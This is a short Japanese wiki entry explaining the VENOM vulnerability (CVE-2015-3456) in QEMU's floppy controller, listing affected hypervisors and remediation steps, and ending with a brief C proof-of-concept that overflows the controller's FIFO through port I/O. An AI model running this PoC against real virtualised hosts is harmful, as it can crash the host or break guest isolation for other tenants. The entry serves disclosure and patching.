CVE-2015-3456 VENOM
提供: セキュリティ
スポンサーリンク
CVE-2015-3456 VENOM(Virtualized Environment Neglected Operations Manipulation)とは、オープンソースのエミュレータ QEMU を利用した脆弱性です。
読み方
- VENOM
- ぶいえーえぬおーえむ
- Virtualized Environment Neglected Operations Manipulation
- ばーちゃらいずど えんばいあろめんと ねぐれくてっど おぺれーしょんず まにぴゅれーしょん
概要
ゲストOS同士は、本来、分離された環境であるため、相互に影響を及ぼすことはありません。ゲストOSからホストOSに対しても同様です。VENOMの脆弱性を利用することで、ゲストOSからホストと他のゲストOSへアクセス・任意のコードの実行が可能になります。
この問題は、QEMUの仮想フロッピードライブコントローラ(fdc)のコードに存在するバッファオーバーフローの脆弱性を悪用された場合に引き起こされます。
影響を受ける仮想化環境
- Xen
- KVM
- VirtualBox
影響を受けない仮想化環境
- bochs
- VMware
- Hyper-V
対応方法
QEMUのパッケージをアップデートする必要があります。
- qemu kvm のパッケージを更新します。
- ゲストOS(仮想マシン)の電源をオフにします。
- ゲストOSをあらためて、電源をオンにしてください。
ゲストOSのリブートだけでは、不十分と言われています。それは、QEMUのパッケージを更新しても、パッケージを更新中に実行中のKVMが古いQEMUバイナリを参照している可能性があるからです。
CentOS
$ sudo yum update $ sudo yum update qemu-kvm
Ubuntu
sudo apt-get clean sudo apt update sudo apt upgrade
検証コード
PoCは、以下のコードです。
#include <sys/io.h> #define FIFO 0x3f5 int main() { int i; iopl(3); outb(0x0a,0x3f5); /* READ ID */ for (i=0;i<10000000;i++) { outb(0x42,0x3f5); /* push */ } }
パッチ
関連項目
ツイート
スポンサーリンク